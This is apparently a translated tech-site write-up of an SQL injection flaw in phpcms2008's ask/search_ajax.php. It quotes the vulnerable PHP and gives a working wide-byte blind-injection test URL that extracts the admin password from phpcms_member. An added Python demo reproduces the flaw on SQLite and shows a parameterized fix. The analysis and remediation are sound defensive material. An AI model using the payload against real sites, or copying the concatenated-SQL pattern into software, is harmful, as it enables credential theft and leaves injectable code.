phpcms2008 SQL Injection Vulnerability: Exploitation Analysis
程序员文章站
2022-06-28 14:08:42
This one was found recently.
Vulnerable file: ask/search_ajax.php
Vulnerability description:
/ask/search_ajax.php
Code:
if($q)
{
    // $q comes straight from the request; it is not filtered at all and is
    // interpolated directly into the LIKE clause, tainting $where
    $where = " title LIKE '%$q%' AND status = 5";
}
else
{
    exit('null');
}
$infos = $ask->listinfo($where, 'askid desc', '', 10);
/ask/include/answer.class.php
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
    // $where is trusted as ready-made SQL and glued into both statements below
    if($where) $where = " WHERE $where";
    if($order) $order = " ORDER BY $order";
    $page = max(intval($page), 1);
    $offset = $pagesize*($page-1);
    $limit = " LIMIT $offset, $pagesize";
    $r = $this->db->get_one("SELECT COUNT(*) AS number FROM $this->table_posts $where");
    $number = $r['number'];
    $this->pages = pages($number, $page, $pagesize);
    $array = array();
    $i = 1;
    $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
    while($r = $this->db->fetch_array($result))
    {
        $r['orderid'] = $i;
        $array[] = $r;
        $i++;
    }
    $this->number = $this->db->num_rows($result);
    $this->db->free_result($result);
    return $array;
}
Test method:
/ask/search_ajax.php?q=s%d5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636d73)>52%23
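As an added illustration (not code from this page or from phpcms), the following Python re-creates the query construction shown above with SQLite so it runs offline: build_query_vulnerable() mirrors search_ajax.php plus listinfo(), and search_safe() is the hardened form with a bound LIKE parameter and integer-cast paging. The table and column names (phpcms_ask, askid, title, status), the sample rows and the decoded payload string are constructed for the demo.

```python
import sqlite3

# Constructed sample input: the page's test payload with %d5 and %23 URL-decoded
# (the raw 0xD5 byte is written as "\xd5"), plus a benign search term.
PAYLOAD = ("s\xd5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/"
           "phpcms_member/**/where/**/username=0x706870636d73)>52#")
BENIGN = "phpcms"


def build_where_vulnerable(q: str) -> str:
    """Mirror search_ajax.php: $q is dropped into the LIKE clause as SQL text."""
    return f" title LIKE '%{q}%' AND status = 5"


def build_query_vulnerable(q: str, page: int = 1, pagesize: int = 10) -> str:
    """Mirror listinfo(): WHERE, ORDER BY and LIMIT are concatenated, so whatever
    reached $where (closing quote, OR clause, '#' comment) is part of the statement."""
    where = f" WHERE{build_where_vulnerable(q)}" if q else ""
    offset = pagesize * (max(page, 1) - 1)
    return f"SELECT * FROM phpcms_ask{where} ORDER BY askid DESC LIMIT {offset}, {pagesize}"


def search_safe(conn: sqlite3.Connection, q: str, page: int = 1, pagesize: int = 10):
    """Hardened form: the term travels as a bound parameter, never as SQL text.
    Wildcards are added to the value (with %, _ and \\ escaped so a user cannot widen
    the match) and page/pagesize are cast to int before reaching LIMIT. A bound value
    is never escaped into the query string, so the leading 0xD5 byte of the page's
    payload (the GBK wide-byte trick against addslashes()) has nothing to act on."""
    if not q:
        return []
    term = q.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    page = max(int(page), 1)
    pagesize = int(pagesize)
    sql = ("SELECT askid, title FROM phpcms_ask "
           "WHERE title LIKE ? ESCAPE '\\' AND status = 5 "
           "ORDER BY askid DESC LIMIT ? OFFSET ?")
    return conn.execute(sql, (f"%{term}%", pagesize, pagesize * (page - 1))).fetchall()


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the phpcms ask table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phpcms_ask (askid INTEGER PRIMARY KEY, title TEXT, status INTEGER)")
    conn.executemany("INSERT INTO phpcms_ask (title, status) VALUES (?, ?)",
                     [("phpcms 2008 install notes", 5), ("server setup", 5), ("phpcms draft", 1)])
    return conn


if __name__ == "__main__":
    print(build_query_vulnerable(PAYLOAD))  # the injected OR clause is now part of the SQL
    print(search_safe(demo_db(), BENIGN))   # [(1, 'phpcms 2008 install notes')]
    print(search_safe(demo_db(), PAYLOAD))  # []  (payload is just an unmatched string)
```

The same two changes map directly onto the PHP: bind $q instead of interpolating it, and have listinfo() take the pager values through intval() rather than trusting a pre-built $where.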